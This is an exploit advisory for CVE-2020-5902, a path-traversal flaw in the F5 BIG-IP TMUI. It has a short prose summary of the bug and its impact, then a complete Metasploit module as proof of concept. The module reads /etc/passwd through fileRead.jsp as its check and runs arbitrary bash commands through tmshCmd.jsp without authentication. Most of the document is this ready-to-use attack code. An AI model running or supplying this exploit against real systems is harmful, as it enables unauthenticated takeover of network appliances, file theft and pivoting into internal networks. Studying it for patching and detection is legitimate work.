📄 F5 BIG-IP TMUI Unauthenticated Remote Code Execution

=============================================================================================================================================
    | # Title     : F5 BIG-IP TMUI Unauthenticated Remote Code Execution                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.f5.com/fr_fr/products/big-ip                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    : A critical vulnerability exists in the Traffic Management User Interface (TMUI) component of F5 Networks F5 BIG-IP devices that allows 
                     unauthenticated attackers to perform remote command execution (RCE) through a directory traversal flaw.
                     The issue is tracked as CVE-2020-5902 and affects multiple versions of BIG-IP where the TMUI administrative interface is exposed.
                     The vulnerability stems from improper input validation in TMUI endpoints such as fileRead.jsp and tmshCmd.jsp. 
    				 By exploiting a crafted path containing the traversal sequence ..;, an attacker can bypass authentication and access internal JSP components. This allows:
    
    Arbitrary file read (e.g., /etc/passwd)
    
    Execution of system commands via tmsh utilities
    
    Full compromise of the affected BIG-IP system
    
    Attackers can issue specially crafted HTTP requests to the vulnerable TMUI interface, enabling them to execute commands as the underlying system user without authentication.
    
    [+] Successful exploitation may result in:
    
    Remote command execution on the device
    
    Disclosure of sensitive system files
    
    Complete takeover of the BIG-IP appliance
    
    Potential network pivoting if the device sits in a trusted infrastructure position
    
    [+] This vulnerability was publicly disclosed on 1 July 2020 and is considered critical severity, with active exploitation observed shortly after disclosure.
    
    Affected Product: F5 BIG-IP TMUI
    
    Vendor: F5 Networks
    
    CVE:CVE-2020-5902
    
    [+] Impact:
    
    Unauthenticated Remote Code Execution
    
    Arbitrary File Disclosure
    
    Full System Compromise
    			  
    [+] POC   :  
    
    ##
    # Exploit Title: F5 BIG-IP TMUI Remote Code Execution
    # Framework: Metasploit
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      prepend Msf::Exploit::Remote::AutoCheck
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'F5 BIG-IP TMUI Remote Code Execution',
          'Description'    => %q{
            This module exploits a directory traversal vulnerability in the
            F5 BIG-IP TMUI interface that allows unauthenticated attackers
            to execute arbitrary system commands via tmshCmd.jsp.
          },
          'Author'         =>
            [
              'indoushka'
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '2020-5902'],
              ['URL', 'https://support.f5.com/csp/article/K52145254']
            ],
          'Platform'       => 'linux',
          'Arch'           => [ ARCH_CMD ],
          'Targets'        =>
            [
              ['Automatic Target', {}]
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2020-07-01'
        ))
    
        register_options(
          [
            OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
            OptString.new('FILEPATH',  [ false, 'File to read for vulnerability check', '/etc/passwd' ])
          ]
        )
      end
      def check
        print_status("Checking if target is vulnerable...")
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(
            target_uri.path,
            'tmui',
            'login.jsp',
            '..;',
            'tmui',
            'locallb',
            'workspace',
            'fileRead.jsp'
          ),
          'vars_get' =>
          {
            'fileName' => datastore['FILEPATH']
          }
        })
    
        return CheckCode::Unknown unless res
    
        if res.code == 200 && res.body.include?('root:')
          return CheckCode::Vulnerable
        end
    
        CheckCode::Safe
      end
    
      def exploit
        print_status("Launching exploit...")
    
        execute_command(payload.encoded)
      end
      def execute_command(cmd, opts = {})
        vprint_status("Executing command: #{cmd}")
    
        encoded = Rex::Text.uri_encode("run util bash -c '#{cmd}'")
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(
            target_uri.path,
            'tmui',
            'login.jsp',
            '..;',
            'tmui',
            'locallb',
            'workspace',
            'tmshCmd.jsp'
          ),
          'vars_get' =>
          {
            'command' => encoded
          }
        })
    
        fail_with(Failure::Unknown, "No response from server") unless res
      end
    end
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================